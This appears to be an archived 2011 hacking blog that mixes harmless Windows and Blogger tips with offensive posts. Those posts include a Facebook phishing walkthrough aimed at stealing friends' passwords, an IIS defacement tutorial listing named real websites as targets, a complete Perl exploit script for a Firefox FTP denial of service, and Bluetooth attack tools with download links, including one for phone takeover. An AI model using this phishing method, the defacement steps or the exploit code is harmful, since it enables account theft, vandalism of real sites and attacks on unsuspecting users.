FireSale HackBoy

Knowledge Shared By FireSale HackBoy...

Hacking

The Art Of Exploitation...

Ethical Hacking

Security Experts...Same Techniques To Make Hacker's Stuff Useless.

Black Hat Hacking

Dark Side Of Hacking... In Short Destruction Of Cyber Stuff.

Digital Stuff

All The Digital Stuff Is Under The Influence Of Cyber Attacks... Be Safe

Monday, December 12, 2011

How To Customize Your Start Button In Win 7 - Windows Tweaks


Have you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. Here is a detailed tutorial on how to do it. The following images shows a preview of how your start menu would look like before and after the customization process is done.

Default Start Menu Button

Win 7 Start Menu - Default

Customized Start Menu Button

Customized Win 7 Start Menu

Customized Win 7 Start Menu

Customized Win 7 Start Menu

Tools That You Need:

2. Custom Start Menu icons (images). It mush be of the size 54×162 with a .bmpextension. which looks something as follows
Start Menu Icon
They must be in the following order:
1st Image - When the button is not in use
2nd Image - When the mouse pointer is over the button
3rd Image - When the button is clicked
I have created a few customized buttons which are ready to use. You can download them from the following link.
Once you have all those resources ready, you can start the customization process as follows…
1. Take the ownership of the file “explorer.exe“ which is located in the Windows Folder (Most likely in C:\Windows).
2. Open the Resource Hacker Tool.
3. Go to File menu and click on Open. Now load the file “explorer.exe” into the Resource Hacker.
4. Expand Bitmap branch in the left pane.
5. Now expand 6801 option, right-click on 1033 and select Replace Resource option.
6. A new window appears. Click on Open file with new bitmap button.
7. Navigate to the customized (.bmp) image, open it and click on Replace button.
8.  Repeat steps 4 to 7 above for the options 6805 and 6809 as well.
9. Now click on Save option (File->Save). Resource Hacker will automatically create a backup file called explorer_original.exe so that you can restore it in the future if needed.
10. Log Off and Log On to see the changes in effect.
I hope you enjoy this trick. Pass your comments and share your experience.

How To Make Password Protected Folder And Invisible - Windows Tweaks

In this section I will show you how to make a password protected folder in Windows XP, Vista without using any additional software. Following is the step by step procedure to create a password protected folder.

PASSWORD PROTECTED FOLDER:
 

STEP-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance you name it as FireSale.

STEP-2:  Now place all the important files, documents or any other folder in this folder that you want to password protect.

STEP-3: Now Right-click on this folder (FireSale) and select the option Send To -> Compressed (zipped) Folder.

STEP-4: Now a new compressed zipped folder gets created next to folder (FireSale) with the same name.

STEP-5: Double-click on this compressed zipped folder and you should see your original folder (FireSale) there.

STEP-6: Now go to the File menu and select the option Add a password. ie: File -> Add a password

You will get small pop up window here. You can set your desired password. Once the password is set, It will ask for the password every time it is opened. Thus you have now created the password protected folder.

HOW TO MAKE IT INVISIBLE


STEP-1: Right-click on this password protected folder and click on Properties.

STEP-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible.

STEP-3: In order to unhide this folder go to
My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options
  • Do not show hidden files and folders
  • Show hidden files and folders
Here you select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat STEP-1 through STEP-3 and select the first option and click OK.
Now the folder becomes invisible once again.

Sunday, December 11, 2011

How To Hack Facebook Accounts Through Phishing - Facebook Hacking

HELLO GUYZ..Today I'm gonna tell you the easiest way to facebook account hacking.
So, let's start...

FIRST we need: 
1. Download Super Phisher Software
2. Account on an free hosting site. such as ripway.com, t35.com, 110mb.com. (Account may be disabled after few logins.)


let's move on...

Now open the Super Phisher Software.
Follow the steps I'm doing.
Just type As I've typed in the picture.


After Hitting the Button: It'll create your fake page.


Now Goto your hosting account and upload the file created with the SUPER PHISHER.

And Now copy the link and distribute to your friends to login through this link.Tell in that way, they're gonna beleive you and login through this.

Whenever victim will enter their Email or Password and will hit Enter...Your job's done.
And a text file will be created in your hosting account.
Open it to view the Email & Password.

Hope It'll work...
Enjoy Hacking.

Friday, December 9, 2011

IIS Exploit Website Hacking Detailed Tutorial - Websites Hacking

Guys today I'm gonna share that how to hack IIS powered websites. So, let's start.

STEP 1: Goto Computer Folder  and right click. Then Click on Add Network. Click Next, Next.


NOTE: If you're using Windows XP then 1st Goto Start> Run  and type the following code
without quotaions.
                ""   %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} ""

STEP 2: Now Enter the vulnerable link which you're gonna hack and press Enter.

STEP 3: Now Open this Network Location. And insert you deface page in this folder.




STEP 4: Now Open the link of your deface page....
e.g : if you enter deface page index.html....then you're defaced link will be like this.
http://www.yourtarget.com/index.html

And see how easily you defaced a website...

Some IIS Exploit Websites are here for you practice.


  1. http://365tg.net/

  1. http://8090gogo.com/

  1. http://99zs.net/

  1. http://bbs.365tg.net/

  1. http://bbs.ttroad.com/

  1. http://fyuser.fy768.com/

  1. http://shop.365tg.net/

  1. http://sys.lubooil.com/

  1. http://tg.feitengcar.com/

  1. http://www.365tg.net/

  1. http://www.99zs.net/

  1. http://www.fy768.com/

  1. http://www.shop574.com/

  1. http://www.ttroad.com/

  1. http://hellen.9s6.com/

  1. http://hanhua.9s6.com/

  1. http://auditeur.lexbase.fr/

  1. http://axoneservices.com/

Enjoy Hacking!!!

 Hope you'll enjoyed and learned through this tutorial... Responses and Questions are most welcome.

Wednesday, December 7, 2011

How To Add Meta Tags To A Blog - Tips & Tweaks


Meta tags are important to get more traffic form search engines like Google, Yahoo, Bing, Ask etc. Meta Tags tells the search engines about your site/blog. Meta tags are helpful to index your pages more quickly and accurately in search engines. That means the meta tags of a website/blog communicate with the search engines to provide more infomation about your website/blog.




Step1:  Goto Blogger Dashboard > Design > Edit HTML and by clicking F3 search the following code

<b:include data='blog' name='all-head-content'/>
Step 2: Paste the following codes just below the above code
<meta content='Blog Title Here' name='title'/>
<meta content='Description' name='description'/>
<meta content='Keywords Here' name='keywords'/>
<meta content='Blog Languare' name='language'/>
<meta content='15 days' name='revisit-after'/>
<meta content='Blog Author Name' name='author'/>
<meta content='Blog Owner Name' name='owner'/>
<meta content='INDEX,FOLLOW' name='robots'/>
<meta content='(c) 2011' name='copyright'/>
Change the red portion of the above codes with your blog information.


Step 3: Paste the following codes just below the above code.

That's It...
Now test it with Meta Tags Analyzer.

Hope, It'll work fine.








Thursday, November 3, 2011

Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:
*Mozilla Firefox version 1.5.0.6 and prior.

Exploit:
#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33". "\x33\x31\x20\x5a\x0d\x0a\x35\x30". "\x30\x20\x44\x6f\x53\x0d\x0a\x35". "\x30\x30\x20\x5a\x0d\x0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
# find out who connected
my ($client_port, $client_ip) = sockaddr_in($client_addr);
my $client_ipnum = inet_ntoa($client_ip);
my $client_host = gethostbyaddr($client_ip, AF_INET);
print ": $client_host", "[$client_ipnum]\n";
# send them a message, close connection
print CLIENT $payload;
close CLIENT;
}

BlueTooth Hacking Tools


Discovering Bluetooth Devices :-
Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.


Recommended   Tools
BlueScanner
It will try to extract as much information as possible for each newly discovered device
BlueSniff
It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices
BTBrowser
It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification
BTCrawler
It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks
-----

Hacking Bluetooth Devices :-
There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-

1) BluePrinting Attack :- Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.


Recommended   Tools
BluePrint
As the name suggests
BTScanner
It is an information gathering tool that allows attacker to query devices without the need to carry out pairing

2) BlueJack Attack :- Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.

Recommended   Tools
FreeJack
Bluejacking tool written in JAVA
-----
CIHWB
Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack

3) BlueSnarf Attack :- Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.
This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!
4) Blue Backdoor Attack :- Here, the bluetooth related vulnerability exploits the pairing mechanism that is used to establish a connection between two bluetooth enabled devices.Not only does it gives the attacker complete access and control over the target but also allows the attacker to place strategic backdoors for continued access and entry.

5) BlueBug Attack :- It was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of vulnerable target mobile phones.


Recommended   Tools
BlueBugger
Exploits the BlueBug vulnerability
Bluediving
It is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, etc.

6) The bluetooth protocol allows devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit pairing codes which can be easily brute-forced. This is known as short pairing codes.
Most slave bluetooth devices continue to use default pairing codes such as 0000, 1111, 1234, etc. So, easy to crack and gain access...!


Recommended   Tools
BTCrack
BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges



-: Other Powerful BlueTooth Hacking Tools :-

Transient Bluetooth Environment Auditor :- T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.   Download
BlueTest :- BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.   Download
BTAudit :- BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.    Download
RedFang :- It is a brute force tool that finds even non-discoverable device.
Download
BlueAlert :- A windows based tool that runs on bluetooth enabled computer and alerts the user each time a blurtooth device leaves or enters into its range.
BlueFang :- Similar to BlueAlert.
Bluestumbler :- One of the best BluePrinting tool.

Super Bluetooth Hack :- With this java software you can connect to another mobile and ….

Once connected to a another phone via bluetooth you can-
  • Read his/her messages
  • Read his/her contacts
  • Change profile
  • Play ringtone even if phone is on silent
  • Play songs
  • Restart the phone
  • Switch off the phone
  • Restore factory settings
  • Change ringing volume
  • Call from his phone it includes all call functions like hold, etc.
Notes:-
1) When connecting devices use a code 0000
2) At start of program on smartphones do not forget to turn on bluetooth before start of the mobile .
  Download-  Super_Bluetooth_Hack_v1.07.zip  (99 KB)



Recommended   Tools
Blooover
It is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. It can also be used to carry out BlueBug attack
RedSnarf
One of the best bluesnarfing tool
-----
BlueSnarfer
It downloads the phone-book of any mobile device vulnerable to Bluesnarfing

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :-
The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :-
APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.



Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely

Email Security Best Practices from Microsoft

Over the years, Microsoft has taken its lumps when it comes to security however as a company, they have taken some pretty impressive strides to make sure that their products are more secure.
However, their security efforts have not been limited to just their products. They have launched several educational campaigns aimed at helping users better secure their computers and networks.
These efforts can be seen by Microsoft’s latest report, Microsoft Security Intelligence Report, and its corresponding website.
This project was set up to provide businesses and consumers with hard data concerning security risks and best practices from Microsoft themselves on how to mitigate the various risks.
Being the producer of the most popular email client software packages – Outlook, Hotmail, Outlook Express and Windows Live Mail – they have a definite interest when it comes to helping users guard against email threats.
Spam, according to Microsoft:
  • Wastes resources
  • Distracts recipients
  • Puts assets at risk for greater security problems
  • Provides an avenue for social and criminal hacking attempts
  • Provides an avenue for phishing scams against users
While stopping these issues definitely is a concern for Microsoft internally, educating their customers on how to eliminate the problems associated with spam will certainly help them sell more products to people looking for the most secure product on the market.

A Look Inside Microsoft

According to their website, Microsoft filters between five to ten million email messages every day that contain malware and/or spam. On a daily basis, they see threats that include spyware, worms, attacks from botnets and polymorphic viruses attacking their email messaging systems. Each day more than 100 different types of executable files are removed from incoming messages sent to Microsoft employees.
So we can safely say that as an organization, there is little that they haven’t seen when it comes to protecting email systems.
To best fight the many different threats facing email, all inbound email to Microsoft much pass a three-tiered process to include anti-malware scanning, file removal and spam filtering.
The importance of this approach is simple. Stop threats before they reach the user.
Incorporating an anti-malware scan into messaging systems helps protect the integrity of your systems because threats can be stopped before a user has the opportunity to allow infected files to compromise a computer or network.
Likewise, a file removal process prevents malicious executables sent via email attachment from ever having the chance to launch. Followed with adequate spam filtering, this process reduces the need for organizations to rely solely on a desktop based security solution or a network firewall. Both of which do not provide comprehensive protection on their own.
These strategies seem like common sense steps that we would hardly need to rely on Microsoft to provide. However many organizations neglect to incorporate these simple strategies into their planning.

Other Ideas from Redmond

Keeping systems protected cannot be done by simply scanning incoming messages for threats. Other steps need to be taken. The best practices that Microsoft recommends to organizations are as follows:
  • Provide email submission services on port 587.
  • Require SMTP authentication for email submissions.
  • Abstain from interfering with connectivity to port 587.
  • Configure email client software to use port 587 and authentication for email submission.
  • Block access to port 25 from all hosts on your network other than those you explicitly authorize to perform SMTP relay functions.
  • Monitor outbound email traffic patterns and look for deviations from normal behavior, such as abnormally large bursts of email traffic.
  • Disable computers or individual email accounts that have been compromised and are being used to send out spam.
  • When possible, process abuse complaints from third parties for email that originated from your mail servers. These complaints often point the way to a compromised computer.
As email administrators, we tend to look to hardware and software solutions to keep things running smoothly and securely. However, protecting systems and users from threats is ultimately our responsibility. Knowing the best way to do so is part of the job description.
Turning to experts for advice when it comes to security does not mean we are unable to do things on our own, it means we are wise enough to use what works and smart enough to know where to look.

WebSurgery – Web Application Security Testing Suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Brute forcer, Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injection, Cross site scripting (XSS), Brute force for login forms, identification of firewall-filtered rules, DOS Attacks and WEB Proxy to analyze, intercept and manipulate the traffic between your browser and the target web application.
WEB Crawler
WEB Crawler was designed to be fast, accurate, stable, completely parametrable and the use of advanced techniques to extract links from Javascript and HTML Tags. It works with parametrable timing settings (Timeout, Threading, Max Data Size, Retries) and a number of rules parameters to prevent infinitive loops and pointless scanning (Case Sensitive, Dir Depth, Process Above/Below, Submit Forms, Fetch Indexes/Sitemaps, Max Requests per File/Script Parameters). It is also possible to apply custom headers (user agent, cookies etc) and Include/Exclude Filters. WEB Crawler come with an embedded File/Dir Brute Forcer which helps to directly brute force for files/dirs in the directories found from crawling.
WEB Bruteforcer
WEB Bruteforcer is a brute forcer for files and directories within the web application which helps to identify the hidden structure. It is also multi-threaded and completely parametrable for timing settings (Timeout, Threading, Max Data Size, Retries) and rules (Headers, Base Dir, Brute force Dirs/Files, Recursive, File’s Extension, Send GET/HEAD, Follow Redirects, Process Cookies and List generator configuration).
By default, it will brute force from root / base dir recursively for both files and directories. It sends both HEAD and GET requests when it needs it (HEAD to identify if the file/dir exists and then GET to retrieve the full response).
WEB Fuzzer
WEB Fuzzer is a more advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit known vulnerabilities such (blind) SQL Inections and more unsual ways such identifing improper input handling, firewall/filtering rules, DOS Attacks.
WEB Editor
A simple WEB Editor to send individual requests. It also contains a HEX Editor for more advanced requests.
WEB Proxy
WEB Proxy is a proxy server running locally and will allow you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or other application which support proxies.
You can download WebSurgery here:
Setup – setup.msi
Portable – websurgery.zip

14 SepWAVSEP – Web Application Vulnerability Scanner Evaluation Project Want to Learn Penetration Testing

The author of WAVSEP (Shay Chen) e-mailed quite some time back about this project, but I have to say I honestly didn’t have time to look at it back then. It popped back up on my radar again when it was mentioned by the author of – Arachni v0.3 – his tool did extremely well in the WAVSEP tests.
The benchmark tests the SQL Injection and Reflected XSS vulnerability detection accuracy of12 commercial web application scanners and 48 free & open source web application scanners, and discusses the capabilities of many others (including information about a potential Trojan horse in one of them).
In addition to the benchmark, the author has published a detailed feature comparison between all the scanners (which generally include every open source or free to use web application vulnerability scanner commonly available)
The research compares the following aspects of these tools:
  • Number & Type of Vulnerability Detection Features
  • SQL Injection Detection Accuracy
  • Reflected Cross Site Scripting Detection Accuracy
  • General & Special Scanning Features
And what the author believes to me most important is that during his research he has developed a toolkit that can be used by any individual or organization to test the accuracy of web application scanners in a very detailed and accurate manner.
I for one applaud his efforts and I think this is a great project, of course there’s no completely objective ranking for these kind of things – but this study does give you a good idea of where different apps stand especially in terms of SQL Injection and XSS detection.
A lot of the tools we’ve written about here at Darknet come out tops (unsurprisingly).
The benchmark and reports (about 13 in total) can be found here:
http://sectooladdict.blogspot.com/
The framework for assessing vulnerability scanners was implemented in JEE and can be downloaded here:
wavsep-v1.0.3-war.zip

Lilith – Web Application Security Audit Tool

LiLith is a tool written in Perl to audit web applications. This tool analyses webpages and looks for html form tags , which often refer to dynamic pages that might be subject to SQL injection or other flaws. It works as an ordinary spider and analyses pages, following hyperlinks, injecting special characters that have a special meaning to any underlying platform.
Any Web applications scanner can never perform a full 100% correct audit. Therefore, a manual re-check is necessary. Hence, be aware that Lilith might come up with several false positives.
LiLith is a program that verifies the security of a web application. As a security consultant, the author often sees web applications that contain security flaws. A web application is a complex entity and cannot be fully checked with “just any tool”, therefor I recommend you to manually verify any results.
How the entire “scanning” process works is different from so called “CGI scanners”, such as nikto and n-stealth. This program will surf to a website and crawls through all the links, just as a user would to. On any possible input field, such as text boxes, page id’s, … LiLith will attempt to inject any characters that might have a special meaning for any underlying technology such as SQL.
For more information, it is recommended to read the following white paper: web dissection using lilith.
You can download Lilith here:
lilith-06atar.gz

VeriSign Demands The Power To Take Down Websites/Domains

I was scanning the news today, and nothing much was going on. There were some half-arsed stories about Anonymous and LulzSec – but nothing really worth writing about. And then, and then I spotted this, which quite frankly scares the shit out of me.
As much as it may well have a use in law enforcement, I’m sorry but I don’t want any single organization, corporation or entity to have the power to take out domains.
It’s just plain wrong, and well the UK has already started tabling something like this back in September.
VeriSign, which manages the database of all .com internet addresses, wants powers to shut down “non-legitimate” domain names when asked to by law enforcement.
The company said today it wants to be able to enforce the “denial, cancellation or transfer of any registration” in any of a laundry list of scenarios where a domain is deemed to be “abusive”.
VeriSign should be able to shut down a .com or .net domain, and therefore its associated website and email, “to comply with any applicable court orders, laws, government rules or requirements, requests of law enforcement or other governmental or quasi-governmental agency, or any dispute resolution process”, according to a document it filed today with domain name industry overseer ICANN.
The company has already helped law enforcement agencies in the US, such as the Immigration and Customs Enforcement agency, seize domains that were allegedly being used to sell counterfeit goods or facilitate online piracy, when the agency first obtained a court order.
That seizure process has come under fire because, in at least one fringe case, a seized .com domain’s website had already been ruled legal by a court in its native Spain.
Senior ICE agents are on record saying that they believe all .com addresses fall under US jurisdiction.
But the new powers would be international and, according to VeriSign’s filing, could enable it to shut down a domain also when it receives “requests from law enforcement”, without a court order.
Yes VeriSign do manage all the .com and .net domains, but they aren’t technically ruled under the US jurisdiction – there are plenty of .com domains that are hosted outside of the US, including the DNS infrastructure.
What I’m especially interested in, is how they plan to handle the fact that lots of things are illegal in some countries and perfectly legal in others. The part that scares me is they will be able to take down a domain without a court order, just on ‘request’ from a law enforcement agency.
To me, that opens it up to abuse – if you are going to do something like this, at least institute a due process to manage it properly.

“Various law enforcement personnel, around the globe, have asked us to mitigate domain name abuse, and have validated our approach to rapid suspension of malicious domain names,” VeriSign told ICANN, describing its system as “an integrated response to criminal activities that utilize Verisign-managed [top-level domains] and DNS infrastructure”.
The company said it has already cooperated with US law enforcement, including the FBI, to craft the suspension policies, and that it intends to also work with police in Europe and elsewhere.
It’s not yet clear how VeriSign would handle a request to suspend a .com domain that was hosting content legal in the US and Europe but illegal in, for example, Saudi Arabia or Uganda.
VeriSign made the request in a Registry Services Evaluation Process (RSEP) document filed today with ICANN. The RSEP is currently the primary mechanism that registries employ when they want to make significant changes to their contracts with ICANN.
The request also separately asks for permission to launch a “malware scanning service”, not dissimilar to the one recently introduced by ICM Registry, manager of the new .xxx extension.
That service would enable VeriSign to scan all .com websites once per quarter for malware and then provide a free “informational only” security report to the registrar responsible for the domain, which would then be able to take re-mediation action. It would be a voluntary service.
Scary thoughts really. However the malware scanning service sounds like something that would help the Internet clean up all the nasty stuff, but then again – do the registrars really care, and would they respond?
Either way, I don’t like the fact that these draconian control laws may be placed on the Internet as we know – that basically allow US law enforcement agencies to take down domains as they please.
What I’m guessing, if this is implemented, it may well become a major target for Social Engineering efforts. What’s more effective than a traditional DDoS attack? Having the domain completely killed by VeriSign – that’s what.
Source: The Register

DirBuster – Brute Force Directories & Files Names

DirBuster is another great tool from the OWASP chaps, it’s basically a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)
What DirBuster can do for you

- Attempt to find hidden pages/directories and directories with a web application, thus giving a another attack vector (For example. Finding an unlinked to administration page).
What DirBuster will not do for you
- Exploit anything it finds. This is not the purpose of DirBuster. DirBuster sole job is to find other possible attack vectors.
How does DirBuster help in the building of secure applications?
- By finding content on the web server or within the application that is not required.
- By helping developers understand that by simply not linking to a page does not mean it can not be accessed.
You can download DirBuster here:
LinuxDirBuster-0.12.tar.bz2
WindowsDirBuster-0.12-Setup.exe
MacDirBuster-0.11.1.dmg

Remote Network Penetration via NetBIOS- NetBios Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.
This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.
Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.
Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.
If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.
The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.
Interpretation the information can reveal more than one might think.
Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
Switches
-a Lists the remote computer's name table given its host name.
-A Lists the remote computer's name table given its IP address.
-c Lists the remote name cache including the IP addresses.
-n Lists local NetBIOS names.
-r Lists names resolved by broadcast and via WINS.
-R Purges and reloads the remote cache name table.
-S Lists sessions table with the destination IP addresses.
-s Lists sessions table conversions.
The column headings generated by NBTSTAT have the following meanings:
Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound)
or from another system to the local computer (inbound).
Life
The remaining time that a name table cache entry will "live"
before your computer purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often
means something because the same name can be present
multiple times on the same computer. This shows the last
byte of the name converted into hex.
State
Your NetBIOS connections will be shown in one of the
following "states":

State Meaning

Accepting An incoming connection is in process.

Associated The endpoint for a connection has been created
and your computer has associated it with an IP
address.

Connected This is a good state! It means you're connected
to the remote resource.

Connecting Your session is trying to resolve the name-to-IP
address mapping of the destination resource.

Disconnected Your computer requested a disconnect, and it is
waiting for the remote computer to do so.

Disconnecting Your connection is ending.

Idle The remote computer has been opened in the current
session, but is currently not accepting connections.

Inbound An inbound session is trying to connect.

Listening The remote computer is available.

Outbound Your session is creating the TCP connection.

Reconnecting If your connection failed on the first attempt,
it will display this state as it tries to reconnect.
Here is a sample NBTSTAT response of my NT Box:
C:\>nbtstat -A 195.171.236.139

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
